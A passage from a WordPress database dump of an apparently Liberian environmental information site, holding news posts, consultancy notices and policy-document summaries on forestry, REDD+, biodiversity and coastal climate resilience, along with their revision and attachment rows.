decentralization policy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He indicated that for any administration to succeed, it must be innovative by that motivation will engulf staff for the achievement of the organization\'s goals. He emphasized the need for trust in any work environment. Commissioner Burgess called on all participants to pay more attention to the training to take the lessons learned to their respective Counties. For his part, Director Samuel Kpakio termed the occasion as important in the execution of the work of LLA staff across the Country. He called on participants to be attentive because the LLA administration wants to see that professional services are rendered to its numerous customers. The 3-day training workshop in Grand Gedeh County started on Wednesday, June 1, 2022, and is expected to end on Friday, June 3, 2022. The opening occasion of the workshop was graced by Grand Gedeh County local authorities represented by the County superintendent Hon. Kai Garlo Farley, the mass media amongst others.</p>\n<!-- /wp:paragraph -->','LLA Begins 3-days Training On Standard Operating Procedures (SOP)','','inherit','closed','closed','','4771-revision-v1','','','2022-06-22 11:32:39','2022-06-22 11:32:39','',4771,'https://ekmsliberia.info/?p=4773',0,'revision','',0),(4776,42,'2022-07-08 14:12:12','2022-07-08 14:12:12','<!-- wp:paragraph -->\n<p><strong>July 6,2022-Monrovia, Liberia – </strong>To conserve forests, biodiversity and raise revenues, Reducing Emissions from Deforestation and Forest Degradation (REDD+) is one of the best frameworks adopted by the United Nations Framework Convention on Climate Change (UNFCCC). Participating countries such as Liberia are making efforts to become REDD+ ready amidst global warming, air pollution, drought and historically extreme weather such as thunderstorms, hurricanes, and tsunamis.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The idea that communities can receive economic benefits for keeping trees standing in the forest is not an easy message to preach when forest edged communities in Liberia are largely dependent on forest resources. In addition, relevant line ministries and agencies clothed with the authority to enforce policies don’t really understand the roles they should play in biodiversity conservation and climate change mitigation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hence, increasing communication and awareness raising among key stakeholders is critical in mainstreaming REDD+ in Liberia for smooth implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To this end, a Consortium of four Liberian NGOs: Partners in Development, The Nature Compact, GREENLIFE West Africa, and Eddie Theatre Productions is implementing Liberia’s REDD+ communications strategy under the Forestry Development Authority’s (FDA) Liberia Forest Sector Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On June 30, 2022, the Consortium held a meeting at the office of the Nature Compact in Lakpazee, Monrovia with some LFSP implementing Entities including the Environmental Protection Agency, Ministry of Mines and Energy and FDA to update key messages for dissemination during awareness raising campaigns on REDD+. A total of 14 participants came together to create effective messages that will convince different audiences to “Eat Some, Keep Some!”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a brief presentation, Mr. Borwen, Sayon, a member of the consortium, added that the REDD+ Communication strategy focuses on the thematic areas which include Land tenure, Protected Area Creation, Benefit Sharing, Policy, Capacity, Participation, Redress, Livelihoods, Environmental and Forest Degradation, Mining, Biodiversity Conservation and Research.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the overall goal is to increase the visibility and general awareness of REDD+ in Liberia and enhance collaboration between internal REDD+ Technical Working Group (RTWG) partners, donors, and executing agencies by facilitating the sharing of information.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After the working sessions, Jackson Nobeh, the Consortium Lead, revealed that the Consortium is planning a REDD+ refresher training for mainstream journalists in July 2022, which will be followed by various activities involving other stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the end of the meeting, Mr. Jerry Nyemah, head of FDA’s Conservation Department, called on each participating institution to continue to work together to raise awareness on biodiversity conservation, so Liberians can receive economic benefits for keeping their forests.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>About REDD+:</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>REDD+ is a mechanism, which aims to provide an economic incentive for countries to conserve, rather than cut down, their forests in order to reduce greenhouse gas emissions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In Liberia, the process started in October 2016, with the National Strategy for REDD+ implementation headed by the FDA’s REDD+ Implementation Unit (RIU).</p>\n<!-- /wp:paragraph -->','Raising the Profile of Liberia’s REDD+ Through Communication','','publish','open','closed','','raising-the-profile-of-liberias-redd-through-communication','','','2022-07-08 14:12:14','2022-07-08 14:12:14','',0,'https://ekmsliberia.info/?p=4776',107,'post','',0),(4777,42,'2022-07-08 14:11:39','2022-07-08 14:11:39','','redd+','','inherit','open','closed','','redd','','','2022-07-08 14:12:02','2022-07-08 14:12:02','',4776,'https://ekmsliberia.info/wp-content/uploads/2022/07/redd.png',0,'attachment','image/png',0),(4778,42,'2022-07-08 14:12:12','2022-07-08 14:12:12','<!-- wp:paragraph -->\n<p><strong>July 6,2022-Monrovia, Liberia – </strong>To conserve forests, biodiversity and raise revenues, Reducing Emissions from Deforestation and Forest Degradation (REDD+) is one of the best frameworks adopted by the United Nations Framework Convention on Climate Change (UNFCCC). Participating countries such as Liberia are making efforts to become REDD+ ready amidst global warming, air pollution, drought and historically extreme weather such as thunderstorms, hurricanes, and tsunamis.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The idea that communities can receive economic benefits for keeping trees standing in the forest is not an easy message to preach when forest edged communities in Liberia are largely dependent on forest resources. In addition, relevant line ministries and agencies clothed with the authority to enforce policies don’t really understand the roles they should play in biodiversity conservation and climate change mitigation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hence, increasing communication and awareness raising among key stakeholders is critical in mainstreaming REDD+ in Liberia for smooth implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To this end, a Consortium of four Liberian NGOs: Partners in Development, The Nature Compact, GREENLIFE West Africa, and Eddie Theatre Productions is implementing Liberia’s REDD+ communications strategy under the Forestry Development Authority’s (FDA) Liberia Forest Sector Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On June 30, 2022, the Consortium held a meeting at the office of the Nature Compact in Lakpazee, Monrovia with some LFSP implementing Entities including the Environmental Protection Agency, Ministry of Mines and Energy and FDA to update key messages for dissemination during awareness raising campaigns on REDD+. A total of 14 participants came together to create effective messages that will convince different audiences to “Eat Some, Keep Some!”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a brief presentation, Mr. Borwen, Sayon, a member of the consortium, added that the REDD+ Communication strategy focuses on the thematic areas which include Land tenure, Protected Area Creation, Benefit Sharing, Policy, Capacity, Participation, Redress, Livelihoods, Environmental and Forest Degradation, Mining, Biodiversity Conservation and Research.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the overall goal is to increase the visibility and general awareness of REDD+ in Liberia and enhance collaboration between internal REDD+ Technical Working Group (RTWG) partners, donors, and executing agencies by facilitating the sharing of information.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After the working sessions, Jackson Nobeh, the Consortium Lead, revealed that the Consortium is planning a REDD+ refresher training for mainstream journalists in July 2022, which will be followed by various activities involving other stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the end of the meeting, Mr. Jerry Nyemah, head of FDA’s Conservation Department, called on each participating institution to continue to work together to raise awareness on biodiversity conservation, so Liberians can receive economic benefits for keeping their forests.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>About REDD+:</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>REDD+ is a mechanism, which aims to provide an economic incentive for countries to conserve, rather than cut down, their forests in order to reduce greenhouse gas emissions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In Liberia, the process started in October 2016, with the National Strategy for REDD+ implementation headed by the FDA’s REDD+ Implementation Unit (RIU).</p>\n<!-- /wp:paragraph -->','Raising the Profile of Liberia’s REDD+ Through Communication','','inherit','closed','closed','','4776-revision-v1','','','2022-07-08 14:12:12','2022-07-08 14:12:12','',4776,'https://ekmsliberia.info/?p=4778',0,'revision','',0),(4779,42,'2022-07-15 15:17:58','2022-07-15 15:17:58','<span id=\"page3R_mcid24\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal </span><span dir=\"ltr\" role=\"presentation\">communities in Liberia by both addressing immediate adaptation priorities and cr</span><span dir=\"ltr\" role=\"presentation\">eating an </span><span dir=\"ltr\" role=\"presentation\">enabling environment for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of Monrovia and </span><span dir=\"ltr\" role=\"presentation\">Liberia.</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/07/ToR-for-developing-TORs-High-resolution-Multi-criteria-vulnerability-assessment.pdf\" target=\"_blank\" rel=\"noopener\">Firm or Company Wanted</a></strong></em>\r\n\r\n&nbsp;','Consultancy Notice for International Firm/Company to Develop Terms of Reference (ToRs) for Coastal Services Under the MMCRP','','publish','closed','closed','','consultancy-notice-for-international-firm-company-to-vevelop-terms-of-reference-tors-for-coastal-services-under-the-mmcrp','','','2022-07-15 15:18:08','2022-07-15 15:18:08','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4779',79,'ekms_bulletin','',0),(4780,42,'2022-07-15 15:17:05','2022-07-15 15:17:05','','ToR for developing TORs-High resolution Multi criteria vulnerability assessment','','inherit','open','closed','','tor-for-developing-tors-high-resolution-multi-criteria-vulnerability-assessment','','','2022-07-15 15:17:05','2022-07-15 15:17:05','',0,'https://ekmsliberia.info/wp-content/uploads/2022/07/ToR-for-developing-TORs-High-resolution-Multi-criteria-vulnerability-assessment.pdf',0,'attachment','application/pdf',0),(4781,42,'2022-07-15 15:17:58','2022-07-15 15:17:58','<span id=\"page3R_mcid24\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal </span><span dir=\"ltr\" role=\"presentation\">communities in Liberia by both addressing immediate adaptation priorities and cr</span><span dir=\"ltr\" role=\"presentation\">eating an </span><span dir=\"ltr\" role=\"presentation\">enabling environment for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of Monrovia and </span><span dir=\"ltr\" role=\"presentation\">Liberia.</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/07/ToR-for-developing-TORs-High-resolution-Multi-criteria-vulnerability-assessment.pdf\" target=\"_blank\" rel=\"noopener\">Firm or Company Wanted</a></strong></em>\r\n\r\n&nbsp;','Consultancy Notice for International Firm/Company to Vevelop Terms of Reference (ToRs) for Coastal Services Under the MMCRP','','inherit','closed','closed','','4779-revision-v1','','','2022-07-15 15:17:58','2022-07-15 15:17:58','',4779,'https://ekmsliberia.info/?p=4781',0,'revision','',0),(4782,42,'2022-07-15 15:18:08','2022-07-15 15:18:08','<span id=\"page3R_mcid24\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal </span><span dir=\"ltr\" role=\"presentation\">communities in Liberia by both addressing immediate adaptation priorities and cr</span><span dir=\"ltr\" role=\"presentation\">eating an </span><span dir=\"ltr\" role=\"presentation\">enabling environment for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of Monrovia and </span><span dir=\"ltr\" role=\"presentation\">Liberia.</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/07/ToR-for-developing-TORs-High-resolution-Multi-criteria-vulnerability-assessment.pdf\" target=\"_blank\" rel=\"noopener\">Firm or Company Wanted</a></strong></em>\r\n\r\n&nbsp;','Consultancy Notice for International Firm/Company to Develop Terms of Reference (ToRs) for Coastal Services Under the MMCRP','','inherit','closed','closed','','4779-revision-v1','','','2022-07-15 15:18:08','2022-07-15 15:18:08','',4779,'https://ekmsliberia.info/?p=4782',0,'revision','',0),(4783,42,'2022-07-15 15:18:21','2022-07-15 15:18:21','<span id=\"page3R_mcid24\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal </span><span dir=\"ltr\" role=\"presentation\">communities in Liberia by both addressing immediate adaptation priorities and cr</span><span dir=\"ltr\" role=\"presentation\">eating an </span><span dir=\"ltr\" role=\"presentation\">enabling environment for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of Monrovia and </span><span dir=\"ltr\" role=\"presentation\">Liberia.</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/07/ToR-for-developing-TORs-High-resolution-Multi-criteria-vulnerability-assessment.pdf\" target=\"_blank\" rel=\"noopener\">Firm or Company Wanted</a></strong></em>\r\n\r\n&nbsp;','Consultancy Notice for International Firm/Company to Develop Terms of Reference (ToRs) for Coastal Services Under the MMCRP','','inherit','closed','closed','','4779-autosave-v1','','','2022-07-15 15:18:21','2022-07-15 15:18:21','',4779,'https://ekmsliberia.info/?p=4783',0,'revision','',0),(4785,42,'2022-07-01 12:12:22','2022-07-01 12:12:22','<span id=\"page3R_mcid18\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The assignment aims to produce a documentary film that showcases all the achievements of the project over the four </span><span dir=\"ltr\" role=\"presentation\">of its implementation since 2018. </span></span><span id=\"page3R_mcid19\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">As audiovisual materials are powerful tools to reach out to a variety of audiences, such as environmental experts, </span><span dir=\"ltr\" role=\"presentation\">national policy-makers, local authorities, and international partners, the documentary film will be a primary tool for </span><span dir=\"ltr\" role=\"presentation\">awareness-raising on the importance and achievements of mainstreaming the Rio Convention through capacity </span><span dir=\"ltr\" role=\"presentation\">building of targeted institutions and individuals. </span></span><span id=\"page3R_mcid20\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The documentary with a short trailer ( in English) will be distributed to the key stakeholders and donor partners for </span><span dir=\"ltr\" role=\"presentation\">their outreach efforts, will be posted on the official website and YouTube and screened at other communication </span><span dir=\"ltr\" role=\"presentation\">opportunities.</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/07/TERMS-OF-REFERENCE-FOR-VIDEO-DOCUMENTARY-2022.pdf\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></strong></em>\r\n\r\n&nbsp;','Consultancy to Produce a Documentary Film that Showcases the Achievement Project Report of the Cross-Cutting Capacity Development Project (CCCD)','','publish','closed','closed','','consultancy-to-produce-a-documentary-film-that-showcases-the-achievement-project-report-of-the-cross-cutting-capacity-development-project-cccd','','','2022-07-20 12:28:54','2022-07-20 12:28:54','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4785',78,'ekms_bulletin','',0),(4786,42,'2022-07-20 12:13:02','2022-07-20 12:13:02','','TERMS OF REFERENCE FOR VIDEO DOCUMENTARY 2022','','inherit','open','closed','','terms-of-reference-for-video-documentary-2022','','','2022-07-20 12:13:02','2022-07-20 12:13:02','',0,'https://ekmsliberia.info/wp-content/uploads/2022/07/TERMS-OF-REFERENCE-FOR-VIDEO-DOCUMENTARY-2022.pdf',0,'attachment','application/pdf',0),(4787,42,'2022-07-20 12:28:54','2022-07-20 12:28:54','<span id=\"page3R_mcid18\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The assignment aims to produce a documentary film that showcases all the achievements of the project over the four </span><span dir=\"ltr\" role=\"presentation\">of its implementation since 2018. </span></span><span id=\"page3R_mcid19\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">As audiovisual materials are powerful tools to reach out to a variety of audiences, such as environmental experts, </span><span dir=\"ltr\" role=\"presentation\">national policy-makers, local authorities, and international partners, the documentary film will be a primary tool for </span><span dir=\"ltr\" role=\"presentation\">awareness-raising on the importance and achievements of mainstreaming the Rio Convention through capacity </span><span dir=\"ltr\" role=\"presentation\">building of targeted institutions and individuals. </span></span><span id=\"page3R_mcid20\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The documentary with a short trailer ( in English) will be distributed to the key stakeholders and donor partners for </span><span dir=\"ltr\" role=\"presentation\">their outreach efforts, will be posted on the official website and YouTube and screened at other communication </span><span dir=\"ltr\" role=\"presentation\">opportunities.</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/07/TERMS-OF-REFERENCE-FOR-VIDEO-DOCUMENTARY-2022.pdf\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></strong></em>\r\n\r\n&nbsp;','Consultancy to Produce a Documentary Film that Showcases the Achievement Project Report of the Cross-Cutting Capacity Development Project (CCCD)','','inherit','closed','closed','','4785-revision-v1','','','2022-07-20 12:28:54','2022-07-20 12:28:54','',4785,'https://ekmsliberia.info/?p=4787',0,'revision','',0),(4789,42,'2022-07-28 13:15:31','2022-07-28 13:15:31','','small logo','','inherit','open','closed','','small-logo','','','2022-07-28 13:15:31','2022-07-28 13:15:31','',0,'https://ekmsliberia.info/wp-content/uploads/2022/07/small-logo.png',0,'attachment','image/png',0),(4790,42,'2022-07-28 13:15:37','2022-07-28 13:15:37','https://ekmsliberia.info/wp-content/uploads/2022/07/cropped-small-logo.png','cropped-small-logo.png','','inherit','open','closed','','cropped-small-logo-png','','','2022-07-28 13:15:37','2022-07-28 13:15:37','',0,'https://ekmsliberia.info/wp-content/uploads/2022/07/cropped-small-logo.png',0,'attachment','image/png',0),(4792,42,'2022-07-28 13:32:28','2022-07-28 13:32:28','Biodiversity is life; managing it unsustainably poses threat to human survival. The threat posed to biodiversity resources is due to over exploitation way above the carrying capacity of the environment/ human beings. Addressing over-exploitation of natural resources and its impacts on the environment can only be resolved when stakeholders from the policy, programs and community levels get the right education and information to change attitude(s).','BUILDING CONSCIOUSNESS FOR ENVIRONMENT/ BIODIVERSITY - THE ROLE OF THE MASS-MEDIA IN SHAPING POLICY FOR SUSTAINABLE DEVELOPMENT','','publish','closed','closed','','building-consciousness-for-environment-biodiversity-the-role-of-the-mass-media-in-shaping-policy-for-sustainable-development','','','2022-07-28 13:32:54','2022-07-28 13:32:54','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4792',59,'document','',0),(4793,42,'2022-07-28 13:29:32','2022-07-28 13:29:32','','Cammue\'s Presentation','','inherit','open','closed','','cammues-presentation','','','2022-07-28 13:29:32','2022-07-28 13:29:32','',4792,'https://ekmsliberia.info/wp-content/uploads/2022/07/Cammues-Presentation.png',0,'attachment','image/png',0),(4795,42,'2022-07-28 13:31:26','2022-07-28 13:31:26','','Cammue','','inherit','open','closed','','cammue','','','2022-07-28 13:31:26','2022-07-28 13:31:26','',4792,'https://ekmsliberia.info/wp-content/uploads/2022/07/Cammue.pdf',0,'attachment','application/pdf',0),(4796,42,'2022-07-28 13:32:28','2022-07-28 13:32:28','Biodiversity is life; managing it unsustainably poses threat to human survival. The threat posed to biodiversity resources is due to over exploitation way above the carrying capacity of the environment/ human beings. Addressing over-exploitation of natural resources and its impacts on the environment can only be resolved when stakeholders from the policy, programs and community levels get the right education and information to change attitude(s).','BUILDING CONSCIOUSNESS FOR  ENVIRONMENT/ BIODIVERSITY - THE ROLE OF THE MASS-MEDIA IN SHAPING POLICY FOR SUSTAINABLE DEVELOPMENT','','inherit','closed','closed','','4792-revision-v1','','','2022-07-28 13:32:28','2022-07-28 13:32:28','',4792,'https://ekmsliberia.info/?p=4796',0,'revision','',0),(4797,42,'2022-07-28 13:39:42','2022-07-28 13:39:42','A Presentation by Datuama J. S. Cammue on Common Enviromental Issues/Problems','Common Environmental Issues/Problems','','publish','closed','closed','','common-environmental-issues-problems','','','2022-07-28 13:40:24','2022-07-28 13:40:24','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4797',58,'document','',0),(4798,42,'2022-07-28 13:37:37','2022-07-28 13:37:37','','Cammue 2','','inherit','open','closed','','cammue-2','','','2022-07-28 13:37:37','2022-07-28 13:37:37','',4797,'https://ekmsliberia.info/wp-content/uploads/2022/07/Cammue-2.png',0,'attachment','image/png',0),(4799,42,'2022-07-28 13:38:50','2022-07-28 13:38:50','','Mr. Cammue','','inherit','open','closed','','mr-cammue','','','2022-07-28 13:38:50','2022-07-28 13:38:50','',4797,'https://ekmsliberia.info/wp-content/uploads/2022/07/Mr.-Cammue.pdf',0,'attachment','application/pdf',0),(4800,42,'2022-07-28 13:39:42','2022-07-28 13:39:42','A Presentation by Datuama J. S. Cammue for Media Training 2022','Common Environmental Issues/Problems','','inherit','closed','closed','','4797-revision-v1','','','2022-07-28 13:39:42','2022-07-28 13:39:42','',4797,'https://ekmsliberia.info/?p=4800',0,'revision','',0),(4801,42,'2022-07-28 13:40:24','2022-07-28 13:40:24','A Presentation by Datuama J. S. Cammue on Common Enviromental Issues/Problems','Common Environmental Issues/Problems','','inherit','closed','closed','','4797-revision-v1','','','2022-07-28 13:40:24','2022-07-28 13:40:24','',4797,'https://ekmsliberia.info/?p=4801',0,'revision','',0),(4802,42,'2022-07-28 13:46:58','2022-07-28 13:46:58','','Liberia’s Environmental Governance Framework, Mandates, and Institutional Arrangement (Challenges & Achievements)','','publish','closed','closed','','liberias-environmental-governance-framework-mandates-and-institutional-arrangement-challenges-achievements','','','2022-07-28 13:46:58','2022-07-28 13:46:58','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4802',57,'document','',0),(4803,42,'2022-07-28 13:44:48','2022-07-28 13:44:48','','Princess','','inherit','open','closed','','princess','','','2022-07-28 13:44:48','2022-07-28 13:44:48','',4802,'https://ekmsliberia.info/wp-content/uploads/2022/07/Princess.png',0,'attachment','image/png',0),(4804,42,'2022-07-28 13:45:47','2022-07-28 13:45:47','','Princess\'s Presentation','','inherit','open','closed','','princesss-presentation','','','2022-07-28 13:45:47','2022-07-28 13:45:47','',4802,'https://ekmsliberia.info/wp-content/uploads/2022/07/Princesss-Presentation.pdf',0,'attachment','application/pdf',0),(4805,42,'2022-07-28 13:46:58','2022-07-28 13:46:58','','Liberia’s Environmental Governance Framework, Mandates, and Institutional Arrangement (Challenges & Achievements)','','inherit','closed','closed','','4802-revision-v1','','','2022-07-28 13:46:58','2022-07-28 13:46:58','',4802,'https://ekmsliberia.info/?p=4805',0,'revision','',0),(4806,42,'2022-07-28 13:49:38','2022-07-28 13:49:38','Liberia has been regarded as one of the Biodiversity hotspots in the world, and one which contains the highest remaining portion (42%) of the Upper Guinea Massif including plants with high endemism. The country boasts of over 2000 vascular plant species, 600 bird species, 75 reptile species, 150 mammal species, etc., which demand adequate safeguard/ measures. Thus to enhance the conservation and sustainable utilization of biological resources, Liberia needs a sound, comprehensive and holistic blueprint (strategy) which will chart the way to sustainable management/governance of these resources.\r\n\r\nLiberia ratified the Convention on Biological Diversity (CBD) on November 8, 2000, and in 2002 commenced the writing of a strategy &amp; action plan that underscores the importance the country attaches to its intrinsic values of biological resources. Since 2004 when the document was launched, it has served as a national blueprint utilized by sector institutions responsible for biodiversity management in the country.\r\n\r\nThe revised NBSAP has been prepared consistent with Strategic Goals of the CBD and its Aichi Targets, as well as Liberia‘s national goals and objectives for biodiversity management. The Strategy takes into account key issues identified by stakeholders critical for biodiversity conservation and provides strategic direction to enhance biodiversity management. I look forward to successful implementation of the Strategy, with support and collaboration of all stakeholders.','Liberia National Biodiversity Conservation Strategy and Action Plan','Liberia has been regarded as one of the Biodiversity hotspots in the world, and one which contains the highest remaining portion (42%) of the Upper Guinea Massif including plants with high endemism.','inherit','closed','closed','','570-revision-v1','','','2022-07-28 13:49:38','2022-07-28 13:49:38','',570,'https://ekmsliberia.info/?p=4806',0,'revision','',0),(4807,42,'2022-07-28 13:58:35','2022-07-28 13:58:35','','Untitled','','inherit','open','closed','','untitled-7','','','2022-07-28 13:58:35','2022-07-28 13:58:35','',1695,'https://ekmsliberia.info/wp-content/uploads/2019/11/Untitled-1.png',0,'attachment','image/png',0),(4808,42,'2022-07-28 14:02:13','2022-07-28 14:02:13','This Sixth National Report of Liberia to the CBD is organized into 7 sections, excluding the introduction. Section I presents and discusses the 20 National Targets that are being pursued, as embodied in the Revised National Biodiversity Strategy and Action Plan (NBSAP 2017). It also defines the rationale for each National Target, matches each National Target with its most relevant Aichi Biodiversity Target, and lists pertinent websites, web links and files, as among the key deliverables.','Sixth National CBD Report','','inherit','closed','closed','','1695-autosave-v1','','','2022-07-28 14:02:13','2022-07-28 14:02:13','',1695,'https://ekmsliberia.info/?p=4808',0,'revision','',0),(4809,42,'2022-07-28 14:01:03','2022-07-28 14:01:03','Liberia has been regarded as one of the Biodiversity hotspots in the world, and one which contains the highest remaining portion (42%) of the Upper Guinea Massif including plants with high endemism. The country boasts of over 2000 vascular plant species, 600 bird species, 75 reptile species, 150 mammal species, etc., which demand adequate safeguard/ measures. Thus to enhance the conservation and sustainable utilization of biological resources, Liberia needs a sound, comprehensive and holistic blueprint (strategy) which will chart the way to sustainable management/governance of these resources.\n\nLiberia ratified the Convention on Biological Diversity (CBD) on November 8, 2000, and in 2002 commenced the writing of a strategy &amp; action plan that underscores the importance the country attaches to its intrinsic values of biological resources. Since 2004 when the document was launched, it has served as a national blueprint utilized by sector institutions responsible for biodiversity management in the country.\n\nThe revised NBSAP has been prepared consistent with Strategic Goals of the CBD and its Aichi Targets, as well as Liberia‘s national goals and objectives for biodiversity management. The Strategy takes into account key issues identified by stakeholders critical for biodiversity conservation and provides strategic direction to enhance biodiversity management. I look forward to successful implementation of the Strategy, with support and collaboration of all stakeholders.','Liberia National Biodiversity Conservation Strategy and Action Plan','','inherit','closed','closed','','570-autosave-v1','','','2022-07-28 14:01:03','2022-07-28 14:01:03','',570,'https://ekmsliberia.info/?p=4809',0,'revision','',0),(4810,42,'2022-07-28 14:05:14','2022-07-28 14:05:14','','Untitled','','inherit','open','closed','','untitled-8','','','2022-07-28 14:05:14','2022-07-28 14:05:14','',1695,'https://ekmsliberia.info/wp-content/uploads/2019/11/Untitled-2.png',0,'attachment','image/png',0),(4811,42,'2022-07-28 14:05:30','2022-07-28 14:05:30','This Sixth National Report of Liberia to the CBD is organized into 7 sections, excluding the introduction. Section I presents and discusses the 20 National Targets that are being pursued, as embodied in the Revised National Biodiversity Strategy and Action Plan (NBSAP 2017). It also defines the rationale for each National Target, matches each National Target with its most relevant Aichi Biodiversity Target, and lists pertinent websites, web links and files, as among the key deliverables.','Sixth National CBD Report','','inherit','closed','closed','','1695-revision-v1','','','2022-07-28 14:05:30','2022-07-28 14:05:30','',1695,'https://ekmsliberia.info/?p=4811',0,'revision','',0),(4813,42,'2022-07-28 14:08:51','2022-07-28 14:08:51','An act enacted by the Senate and House of Representatives of the Republic of Liberia.','Forestry Development Authority Act','','inherit','closed','closed','','1697-revision-v1','','','2022-07-28 14:08:51','2022-07-28 14:08:51','',1697,'https://ekmsliberia.info/?p=4813',0,'revision','',0),(4815,42,'2022-07-28 14:11:34','2022-07-28 14:11:34','In 2004, Liberia initiated a forest sector reform process, which included a review of all existing logging concession claims. This required a review of all laws and regulations relating to forestry, as well as the forest policy and management strategies. The action gathered momentum with the enactment of new forestry legislation, the redrafting and adoption of regulations for implementation, the development of a new forest policy and the formulation of a new forest management strategy.','Forestry Laws Summaries','','inherit','closed','closed','','1699-revision-v1','','','2022-07-28 14:11:34','2022-07-28 14:11:34','',1699,'https://ekmsliberia.info/?p=4815',0,'revision','',0),(4817,42,'2022-07-28 14:13:29','2022-07-28 14:13:29','Mutual Beneficial Programme, Projects and participation have the potential to yield benefits for Liberia. It is against this background that a Mining Policy has been developed to create an enabling environment for the facilitation of programmes and projects. Liberia is blessed with mineral wealth and as a result the mining sector is making a significant contribution towards the economic 